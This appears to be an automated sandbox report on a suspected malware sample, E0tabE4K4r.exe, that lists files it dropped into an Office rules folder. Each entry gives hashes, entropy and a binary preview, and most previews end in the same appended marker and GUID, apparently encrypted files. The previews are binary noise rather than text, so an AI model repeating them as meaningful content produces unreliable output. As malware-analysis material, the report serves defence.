                                                                                                                                                  Preview:<?xmlI...t.?*c...=..>.T........9..M<.@......*.A...{,..t!E2=.4.B...nQ.s-.V .._,..d....P.-1p......qp..5h.[...<.O5&.,.\.9..Q...1....0....~..3......[.t5..#,......'x..X..yD..-.J...8|...#.....`....S.W.yZ[pw...-.E^...^...=-.Z..6iE..Y...pj.k..-.Ev...3d...&.HY.:.@Pe..L..m0~ ..+.......m%..x;..,..A>.`.O.....W......[...ZIc.fnF.q.9.-#*.u...>.J5..H.N.x..*.R.../.4..../..4..G.y}...Z..-oBNj../_.......$.8..{\!.......N.|yS.d.Z....S")N...x..j..*W.a5 ._..jY..~.L.%:a..]`..I0.s8.D.l..NK..H...X..u.....X@TT<N+['j.f.W......h.Ev..8.s~...."..Wc.s.'l....1*....o.9;X...p9.K.g...q....@........Z7.f"..\.....Y.k.5z..Qw..FK....O\.N-.8.~.n.j..D.a.U..^.z>.I@.R...x.....-.3j...8W..3...Y"/..2..q0S...~.b..G.gB..i.D|(-^..4......._.M.<z.g...............<......a......[t.}...n.X*.G..rO3..._.....B"...e.....Qi..g..O.j...39.4E@|">.c.!...|iGq..U;o...$.2'9....y.m.U..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170053v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):787
                                                                                                                                                  Entropy (8bit):7.741650812730047
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:we2zsrht0qcA1us+b66qHLcMyT0E+6QTFLMidnQ2bD:nXdcQAeD1nE+RZtDD
                                                                                                                                                  MD5:496EF4D4E474866E6269CCECBE380262
                                                                                                                                                  SHA1:540AB47691B79AA5B142C6C75C73DE6B07DC8A27
                                                                                                                                                  SHA-256:8E2175128C100EA307F59F811E9605179F34B67AEF501D00A04AF14E7AD1CCD7
                                                                                                                                                  SHA-512:E6909E4DF77730FCF7C9C28BA61A44639FA329C96F18CEBDF574BE3D629B91C53E00160F8DC29B61D3FB1F5DD7E2E73E5E9D0F7FF10A30E1A323A44DF5327B49
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...n...dx..Kx.2.f......{.jD8........m!b.....|%u....$...`...T?.l|.e.1.#...3.......].{.R..\.O.MUucR9Q..0.8..p..W..T.....+,...h.|...TU..l..$..K....V>.k..O-..,0..H.U..._..yG...rL.G..y.&.a....8._e.3......d..31P?.+... ..r...%j.......G#T.o.{.zJ".STe2T.........!?N.+..L.4.........W.R..:....T.',.2..b.l.G..cc.../.....U.Z..n`+..|..y..h..0.lR)J..p...w....TD.....!..@..I..j.z.5....F~{..2.-U-R!"u. .K .....+.u..b&.'.B.U..Gr.\..0....^-...Axu.^(..z,z..........o..*>.&S...?)p;%...8.[.F..g.I.yB5.C.k.......a..._i-.+;^....Bb.]..._..<....q.....{......QP..U. ..W.....#........"..GS.\a....2.L..v.;c.7.S.Kv.0.^.:....7..i....t.....+/)..#.....l....,..J.]....F<t.V.....6.Jc.....x..Jbnne..lnV..@...p3.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170054v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):961
                                                                                                                                                  Entropy (8bit):7.769713636750011
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:E3vQDvZQfkwWzliQMt2jrVdF5NWatiLtLT2bD:AQDviMTzliNtE7FSatC8D
                                                                                                                                                  MD5:87BB351833BB72C6DD1E47A195C58689
                                                                                                                                                  SHA1:5F9316CCCE30B3B0D222A03AEAB6EA47C8793F3E
                                                                                                                                                  SHA-256:3EB4ADA8BCA7C830F8E3A8CE4607F0657F52EA412497C2EE79202706A127BFF1
                                                                                                                                                  SHA-512:A92274C6F2C6C7C3724BC72AAB539CF6A5A8C6699C207533D322A781A51BD896BEE36003863684389AF2B0A3067A671A0F00C1FCECD60C755272111F41E2E887
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml`#.Lj.&.W{....);X..ms..P.i.E..@.!.h.6........s.I...^R..ZA.Lq...&.q.............};".. ..K.....|n...;W...sV...Q.....m...gD....c.p....Q..c.A...n.%O.M~a./.`5..{.H(......#.fV:|.z.N.....G}.k>.%...h[J.@.b.. ..'H.-..-.......j..B..Q....Z..1P...y....+..O..ipf.[.....i+........G9J........].{........Rx....:..b^..F@.3H_.}......._..#..0.MCd.....TiF.a........b2.._.T.^.xu.l^\.!.\...g!.g.J.?Ft.5.....P.....X...F?w.wF.#.....KB:.a]..g..~......3.P.....)x>g.=.^.n..D..6t!...h.f...i02z......0...(..o35.....BH..a.'?.iO.D....@r9#.o.G..5...\d.IA.4*'..D..|y..8S..!.o.........&U...{8_...c..n'...5B..m..~*}.Y...j....7p$0 =I#....x..j.v..no'.p...;X-)......;k.........P.d...._y..M......B.`GL..6yW....M.Fd.t.`..!.X._..V2..T..Gsm..$....2...{.7+.ZTs.;..Z.K.D.[...|. .{*.....x.\..xH..^..F...b.....w.L.....P...O.M..|.. ...;..P.H..nbP]z.`....'w.mJ......q.C...V.c.".#mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170055v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1131
                                                                                                                                                  Entropy (8bit):7.835286124595105
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:cx72gLWl7knqZMLHnNBB7oLa+BljvjMzYEj8eJ0BmxG3WSH0CQOfr2bD:cxRyVknqGLHn35oxvjMSeJgaGRHZQOAD
                                                                                                                                                  MD5:F4FFAA1F3A51D9A8FF6C2D1C70DF8894
                                                                                                                                                  SHA1:7F847E5B627E84A2CF3FED27AF71B20BAC9516E3
                                                                                                                                                  SHA-256:7A57120E099397BE23017CD52466B04808815D9ABED852532813D60E7E71BE03
                                                                                                                                                  SHA-512:6D55F7461C690443AC010747FD4472DA197EA4DF24BCE8EC595EC5ADFEBE456F5CF1178670848C25003CDA826BB9FBC9947982279341AC5597F8DBCE97339150
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....%...s.%..H.r@x|.Gk(.......?..v..#H.....8....#.g,,.C..\e1.=.. Z.As.FQ<......aa8...#.W.......Tud.q.:.xTu*..yVJ..h_..........uNp.z..>K...L..{.eLN..8.=...TY...@]..dY%..Q.8.,F7.>w...z.G....eJ....MF......k...4/s. '..S./m\j...-.9 ..nY..kFj....O...S..g....ju... ...]..G......)...T)T. H....4~.u.u`..(C....q..~q......D.M.<..r...D(..?.H2......*....Vj...t..~K@...%.#9..^.\..\.6(Y.u..........?...[|..'tP..f-..........64C. C.R.......i.]..4.+^..~..~.^z.w...l9...J.3..v...b...'..E8..j...xZO...fAN.@.E......p:+.b.%w.U.....mX.9.$..,....Y.k...@g.B..y...j..(j.3^.<.A7v.!o9...M.....G/..+V.F..#.....u.^c.L<...R9..R.._.XG?..(......T.."pW[..ND.r...}...v..vFu.kk|........w<I1..;8T/.#.U.1....+.}."$.aa..&.%r..<q....:*$.B..u..x.N.WX.E..'......W....`..).V.8...1....s.d.....E.>.k.E.~...>.+Z.+D.1.d.YJ....J....#..[....~.t.z7.rP.4.y(.sE....To.2E..@..+8..2!.C'$.............-.T^.Z....k..{7.^....n*...........r..:l.;...~...>W{.L.."...#.Q>.D.....,..CA<e\I.V..C.|.g.~...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170056v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):987
                                                                                                                                                  Entropy (8bit):7.786249181254497
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:0CZKkEN/Tz+8KRgeKl21+IFGzfFw2YMMp6xwf3cMJSJkuHV2bD:WP/vqA21c30p6G/cMJSwD
                                                                                                                                                  MD5:E9B16D5AA8D95D8CBFC459B0B4E5ECF2
                                                                                                                                                  SHA1:EB16ACC744FC4455494F1A5F9767210CE5AC2FC5
                                                                                                                                                  SHA-256:ED6EC2060E9E5B1CC4D48B28300EF8AC30F2E92A0786894B52D65B92FF26FC78
                                                                                                                                                  SHA-512:F819C17D9B26C71399E075BD3E32620DB968849DAC66559AB4C5E8FA6072251293DB1EC3EC9D687F1986AB06F00198DB9ED5F4D5059EBF38A07EB3EB7384D889
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml"H.m1m.......U....$.7.X.E.....iL....{"..Y..TPo..Q...e.}G.He<......H.....r.tE.)......)T..!.F...u...^..~,A...y....b.D'U.[.l!.G....8;....3k......j!&.oD T..i.8..0.[... ._.Q'..1.k.D..|..Lit9...z..o......t"s....8T.....6N.[...w.l.3..}..$C.Tm.b..j#.G..XB3D...?{>.....(...l@z...].; ....ezz...@p:..?..|?..<.Jqg..UV..O!..qg.+..-`..........cc.Z.r...*.._.,.f.u....2....e..9.<.c.....x.../1..O..L.X.....Z..-..{\..cGE.............y.....ic...K..y...L..;....#......R..\0._.."..s.a.'..3....U.z.....V*......Z..&.1.....o.R..2.z.....q..W-.9.......(....+..P.>..).-..*.........F...[.R...8....Az$nZ....].r.t.4..?.p.@CWT...R...Nr..i.hv9-..h".....0),........J...@S........t...>p.H..&}....s...k.s.\Q.Lv.EO..2..Dv.-.......dh.5.-...~...?.5....h......*.5O>R..z.7....|.<W.cQ.$......k.....T..u....@>.;..s..Z.........7f_..}5.c..z..F.gT.......e.n.......O....a..V@-.q........E.....T0......V2mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170058v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):857
                                                                                                                                                  Entropy (8bit):7.731821153424399
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:F68ZwiB35emPpBdjqZ5I5mYR0xUpAT2bD:g8n3kmPpPjS5iLW6JD
                                                                                                                                                  MD5:E0A9774CF0963C981FF82037C4F11BE4
                                                                                                                                                  SHA1:E9493F85E7D41032A92FA3866ABFA0BA5EA0512B
                                                                                                                                                  SHA-256:055686E563509E8DFFDC8E8E2FEE43FEC1DD58C557DF3ADD078BA0E976D7472B
                                                                                                                                                  SHA-512:311F7A57A025919AAC0E0A11FA7C0438745BE9E29C270D17D83D7F59B98B0AC72D6542ACB171A3CE4987DF8B523077E560D113ADC14B7BE99C1C3B278E917D78
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.1.".@.</0.n.._.i..TE..o.,9?..3.4.]...%n.W.4.D..z..N.....s..f.Eao~...}...".B.kQ.t......._.,r.<..a`.m.$P..%k.....{.?./ou.NI......B.9...*.m9Xe..g...5G..Z..B..o...|=...&..X..oQ...=......\.).0.A+..X.&..A.6=.z.....J?...5.i.j5.&LLmk.+d...M.^&......[.v..l....uN.Q.;.n.:5..$&.E{,...,........;^..i..I..Z. J.c.....g...&p.;.."...9.d.J.$(Y.?.....Fg...;F>...m..m%l\s4KA......w.M...X....}l..h....;-EpE.o.@..p...(G..k..b)A.}../..P..H-]....O.g<[.|$.........((....j0.I.s..t....>jM.R...........v.....BZ.E.N.ov.4.y..wx.....:&...cc.&c]P6.E.]..`.R..H`...."0.}.@8..F.p$..(.....J!.QO.uL.:h..>)..j B..gjq+..^.'^.,.S.4........-$(.]...@(."V..[I...8......_.........n.`....2..].#.YJ..I(..tw...NE|.{.&..T.9..M..3;..i.-....q..4......-..1..J.JG...[.1_.G...9.D.{o.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170059v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):859
                                                                                                                                                  Entropy (8bit):7.745390420455671
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Kku4FDwww7PBg7gHyWRq0NDlfjflII28o2bD:HFDAzBu05lrft26D
                                                                                                                                                  MD5:62B8F17033A2D815959D2B03755F5ABE
                                                                                                                                                  SHA1:71486E679B1F4F18D1389459F5351226FAB2CC68
                                                                                                                                                  SHA-256:3114CDC6CC7BAFF4E1D5EE02BD5C28D7F813BCAA51170F37325BD09767F26115
                                                                                                                                                  SHA-512:4DD1FFCF9FF164F67F4004D1D975B2570CDD3538D76A52B1B33C8C6E444D2ABE269A9AB955CE2017489ECD3BC086E3423BD3BFA7D9768C5FB17F65AD702D960B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml,,..e2....va....,.p...D..Z.....g.[p.T.q..aJn=..8~.D....... ..!...P H]n0.;...735@.tf..eF.~....5.2.v.:s.:..D....O...l..Y.....m.5^w.o1GiM....)P.F-.7N....LPI.K..{...k........-......j.7[...............H.w..O..:....7.`..X...P(.9..h..G..%.iH\;..'m.z.`..j......M.Y..=..`..........8.pw.@#.4...[.h....T.....Z.$...=E.k...Nn%X..,Z;..V..q..vq.....T..sx.Nn..b.Zy..,..<e.9n.m...,..B.F..t.:..@.0..W.ak.#...4w....k.....%c.z.u..,.j...?-....Wv.i..AI...!....7W)M...K$.S.....*...D/w.....<V..S..S)...-I'"h./..sL.....%mQ.|._8..r.}\%AK7TX..L(.$..2r.].{....'.7.C...c.x.T.... ._.=/.D..n.cn.N..ncL..P.1v...N.D.jW..&."m.....P...Kie......9...B.....c.W..1.8T..P..l...-n..>R..........".G....L...d~;=,.v^|I........T6.....eS.%I.{*N..P..3....).xGR."S........;1&......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170060v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):725
                                                                                                                                                  Entropy (8bit):7.699080007226553
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:NZ3mw8SUVj4++9KLZWQoj6Bjk0vbuDP8wR024qTAYpqs2WK4vy2SUdNcii9a:rr89v+0m6dkobO9RLAa2Wg2bD
                                                                                                                                                  MD5:9B339882522B098D06829E0DA4CADA95
                                                                                                                                                  SHA1:7EA4DA61BF911DAE0416D9C3B0B5437E4FDE1E59
                                                                                                                                                  SHA-256:445B0B65AFFA48194DD4135394126CFE6E4017A8E6C5A8C108EC2792E99BFBCE
                                                                                                                                                  SHA-512:75D0BB4EDCF0AC5C59C7163557B5B0D2CC63BF6A949D93CC6AAFFD9F0C57B9532675ADABEB9FFA6878AD6BF953DE939B6227100FE72BC1361DC575F50DC23417
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml3..7....{X.R....9I........$:I/x...g....&.XG.p.J..{..X......@.}....$.f.)[..4)yk,$..{.'dA.N..........S.Y.s.".W...I../.64)Cx..$.jA..FxT..3zt^c............m.{...C.e.-..{..d..F.....|d6[..0.F..bB7.OqDj.?!..}MN.;).Or7"ZrM...iL..h.:v..*i..F.C.p......z.7.._EJH..e9.d[.#.[.....).|D-......wYi0......&4$F......r.(W.C.c.^(...d.5Rn..nr#R,..K#./..%..>.......V1..:;..F...(T.,a.w.9...5M.2q*c...8F....^.../....'...A./]=Kl.O.9qwUaw..q..+..k...._.=..de...*..8.6~QG'.....^..K.XU...c>.........O.T.R.t........_T...l.<u*..T..t.9m..L..c......sz..l.8...A..{C..v.4...t..2.._8.g.......0k1L.Y.....G..@..;.d$h.X.kn.%Hz;....x..'umMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170061v5.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1175
                                                                                                                                                  Entropy (8bit):7.821856178155515
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:GOVAw70HtJN9PTQF4TlxLzkLJXIamCZ3Ufk7Pmy6T6D4542bD:ZVA2ytJfPTQF4x+tIam0CyUY4rD
                                                                                                                                                  MD5:08DCE454B34731CA123DF82222FEACBD
                                                                                                                                                  SHA1:A4E4D6251F36236BA4486F5A9740F2C6B3FBAFB5
                                                                                                                                                  SHA-256:A9E014F0F5B9F069A499BDC969ADA9C0DAEB46BFEAECF5D6A618F27DE54B303D
                                                                                                                                                  SHA-512:B60B86D00AC1362C307DABAEAEAAC3F3A2417B15B395B09E775436443371A2F8D0D40B2651065443F9863DDF081498F2F2FDD42D9D6B5BFBB8E1C88FBE1BFBEE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml9.....M:..W.P:.s.%.......o....EOl.......k...P&.2.x...p.......%.p..g.xK"............a9..#oK.A....0/.X.?.......s..\..3.B.......HG.E...)..e_.y. K.gB.P. :..........9..+...S.((B..c..2.2.z....N..p.T..C...3b.C."..t.b\.......W......Y.3.b.V.y..5.9.zG...>...+0."d"....NF'...u.,........l..:j................G.lDQ...B_.."wA.6M.......L..2..."..,.b1".%Dy..G..R...<R@O@....f..#:........=9.g..7!.\Y.. B.DU.,.b.........]=.1s.s..K"=S-E...G9........=.[.f....Cp:.>u..+....l.($...._8..N..47.'..O-.S.'.cF.-K..X.......O)..=.Ya ...7.."..M..>.o.......Q....(VQ....8..I...[XGD.!{..t.H.......f........(.......1.1..........g..G.....Y..;{M?...>0..r~x...L.......!..q..Y.)oV.!.KT.\~....^L.q..z.;G`~~mC.m..s.%.$WJ.!.?w......9.e.Y&..\..!..XSy.6..Z.J....`.~C....&....3..6....s).b."'ne...u. +3.V.6>...-~..o.,;...9...........d..:.>'.....P.vu.El..\..$eH.....4...+.d..|.T#!&e.i...DL.n....\Q{.Jo..../.m.<.o.iM8qD9.8..ZU.j..V...f..d....._..|*..Yok....e.Xt...Z++.~>N

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170065v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):724
                                                                                                                                                  Entropy (8bit):7.72945788090588
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:MoR6vW1lVpOl/nSMZGLXqLcXThTEDbdnvLZHlXyxKZatilcFNozSUdNcii9a:Vbpu3ZuqAT2Dbdv1FCgZatnT2bD
                                                                                                                                                  MD5:5843E11CDC564FFE0E2D0D2A056BEFCD
                                                                                                                                                  SHA1:ECBBA4E22A93BD03EDFDC6E4882858005201CBB0
                                                                                                                                                  SHA-256:A6BBBD0A13B706303EA69D167A5F231D73E5BC9284ADFF426CA3E859B5550957
                                                                                                                                                  SHA-512:1749F656B2E892BCEF5D36C381394C512D75BB4E6366206FFA40D8DBF122EF56C1A3808945DE440504B69A09DF8DFA383B0696570D27F2B694807895D1868A68
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml1'. ....!|..9...I..|.....p?....If.:..)....`..W:..n..a.,.6C.#..A.n$.....%...s...eT?X...%*.....\.+..Q....2.1,.t..q..?j>A..u:-.c....k.`...R..w........a..6..^.9t......A{Y../.V..C......3B..F.....2.....K........5.NH-.U.D.\<.R._.Q.. .n...J......e..."...x..c...}.V.)........c.t3..O.:..L.=.`....lL..@}...../.!c&..H].>..ZA.......oB....>{xT....... ..2.m.2BI..{...4h..d.`Aiw.v.D>....S....H.s.......o.....J....ijv.%.*c...].|M..u.5...G:"....j.d..Z.....%.....(..".*.mv^...TI.@&...4,Y....}h.bop..k4..`....7.zXmM.8...-.e.. ../....}....\.7......7...I..-.,..`...N..E.....GJ.h,z.(.)y}J#q....E<...#Q..W.|4.).zT.....U.%...r..D......N.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170068v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):746
                                                                                                                                                  Entropy (8bit):7.647929877361564
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:YyTx381D3Ydc5n4GoartzL5eLdfCXyJQfVIm7J6N+/txrBSUdNcii9a:YoxELYcK3ct0cLtD7J6N2txrk2bD
                                                                                                                                                  MD5:DFFAABB1BBC628EFDAD3FA80F89DBA5B
                                                                                                                                                  SHA1:D3DD511281DA411963BEE734109E27C4C8873C47
                                                                                                                                                  SHA-256:8D428467E6624CE9255B6F8C0CDB4D93538C328E5CE1CDEEA865FA88C1B190BF
                                                                                                                                                  SHA-512:36467CCBF1F043962B947F16D988BC9406AD3A451402E820EC94BBB255B184BACC1076022B048294C942E663CF3F2F0DDC6305706DA02B1406916B2812BB2438
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..p...q....fn.S5....,I1.".Qi].z...*.{.Km1..._.......+v>.^.B<IyX....f.......r.nDW8.....Q......B.........A...........*^X..?......+s*J.."... ...$..]..E....g..=6..U.H.T..` ..C.2...O%u.5,......}.........,..T..z....o.N....A..A.H}\ib".r.]..ev.kV.....>...."..mU.v.Y`..|._R.9.E.H(+}..F0w3.S......9.I.q....._]..@u.g.S../.,.gmc.I..7.'F.....Y..o.{.2m..V..o.yM5.W^.f..iE..|...3...Z|`./.T.`..mP.5nQ>..%i.c.d.1...p...W..s-J...+..OM..+.2..J.'.!|....l#.....8..8OJ:........E.rf..8.E....},F.X..:.#..vCe.&]..fk.gl.*\...`.Hpj."....iO.....).f. u..t.R..~..70*....9..{...-.:.z.a.*..-.S$. ..1..eY...+...._.....D}..=[..L.t.5s.|.v..u.u91k...t...>[uF....).eL..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170069v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):857
                                                                                                                                                  Entropy (8bit):7.737395999037629
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:bKYIWo0fOIQ7p4p62Lwi3HFLNq8aCAF2IR2bD:bK4faqplsopbTAID
                                                                                                                                                  MD5:9625EA1FE66ABF9EF045AAA791FCB4F9
                                                                                                                                                  SHA1:972846C810744D678A532A998A58BA5C8834F650
                                                                                                                                                  SHA-256:83D041B1AF502068D6AE7CD51F5B355B2DD0E2C9A749E0C01B136774C4F69FFC
                                                                                                                                                  SHA-512:A07111D7729DCBFCE9E3DFC51B1F19C7D25197AA14F6CC12DF063ADF35C80EA5AC827774CF0E59838B7B637FF72A9BAFCA799B6566D1BAE0E6031583A67A4A51
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..<dA+./...l5.Hf..i.*.~..`......I..B51......2,`$.6......~....i..oC[3..r..?-..hu1v.....P.....I..V]aU.zR'.4...../...._..U.'..)..LC.......X...e..N..r...(..s^..~A._mt.i....1u.DN.C...%X.Z..5.....y\...Y........m...9..............1QM.KSB......MG..t.b..<.....>..YPN.t..\0..J......~L{.6..m.....?MM.25zEZ..p.oC=.........F.?..'c9.aG...b...ko....T....E.....XFh.Sh.YA.........~...s....B....X._<.*......>...+.w.{&..-.<..]....;.L..~x.B.(........t].k..UH)_a.....bNF..H>.Ac.U3bd.c.F.R..|..\.c.U.$Yz24..[..wH..P.^.m...+....R..J.-...e$.m@7.v.V........P.\....F...|...z..t..?....M+..G@"v.I P+E.?[.......$.I._..h.......Q..~m..y.1F.Dy....z.wT.h...?....P\.......Gw...,..... 'T......|.<=..f..e='....'%.G...f'...n....Tb..ItS.0Y...g....t...w....9..oWU...I"mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170070v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):886
                                                                                                                                                  Entropy (8bit):7.774284570927756
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ILaU4jBPTnKzTTfuk9oV1Gk+lLmNERAv9fi28Us/XGveLtS2bD:I+U2BPTnKbf3oVkLgZ998BztpD
                                                                                                                                                  MD5:AD8CAED2DED87465321C71990908E0D3
                                                                                                                                                  SHA1:CF79ECDD0B78813B8E53B25861D0851FCF3007DF
                                                                                                                                                  SHA-256:841C24BD20AC183F09ECB9B53530DF7DA517AAB6FD2FB99A54624FB3DBA978D6
                                                                                                                                                  SHA-512:C415EAA2F4A00CDD22B2FCCA2B3385E127672662477399910B7CA8D7DEE821364D321FB7514897D901980F7E1E00BA16FA562432A608781C2B64AD924D515EE4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlr.ML..y..X&L..EqW.<5.kt.._Z.)P/.^..qLq......\...~..._F.D..].m....."a. ..#..O.B^.......k.u.e.avL.d..E.E. .!."...!x.:.n...?..NR...[...T6~Zs.^.....f(i.6.*D[..m.:....O....tqvop......1.a.v.../i..Y.:u._#..'u....8-w...|{....2...s7......*eG..w.z.0.o.J.n3...y..I...m...0.2..B.36.{.pGm...L.....J.O..H....:%.!..GHkj.2...G............7E..{*..q..li.Zk..M.9+by'.`..a).\.....}I...&....x.tAf...D...y......BN....J..15..o.le...Hh..M..5@..}l..' ..}....c......M.,=..-........:.6....T..r...5./.~.y....tO.y......1..-KH.-....a...|.M..%A...."{DB........A...'.Gd......h...p..`....0:._......vk\.>K..........Y...r..8.{...s`.u#....j3S.[.......&.....V...M...u5..Ch..xB..B.:....w>.O.2.1.....V...9.(.Z...`...P.s....9.8.XU..w&.4..s.5e..z..F....y....';....fW..;d..X?....O.?..S.7...`-...e..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1197
                                                                                                                                                  Entropy (8bit):7.819722911445194
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:mkj3ASYR6i3kAqoIEggJx1sedcxEOmmyGwLcoKjAlHotGBr2bD:FsjciY1UsemuOYjdKjaKpD
                                                                                                                                                  MD5:CE12A53140155D6E751A7B39CB1F6DFA
                                                                                                                                                  SHA1:F30F89EE48D83462DBA2CBF87B4CCC2D756DE032
                                                                                                                                                  SHA-256:A16B9E810ED73AB5D5A4BF4F8E865D12F8553DDB93AA9843C924E7A75C824D1F
                                                                                                                                                  SHA-512:28BA888ED67956BE9E0BC648E185CE3209A95EE5B683491CDC2041DF75447B466591B77FE69D2FC95D6369F40937FF993219B23950EE4664FB23108E532A5BB1
                                                                                                                                                  Malicious:false
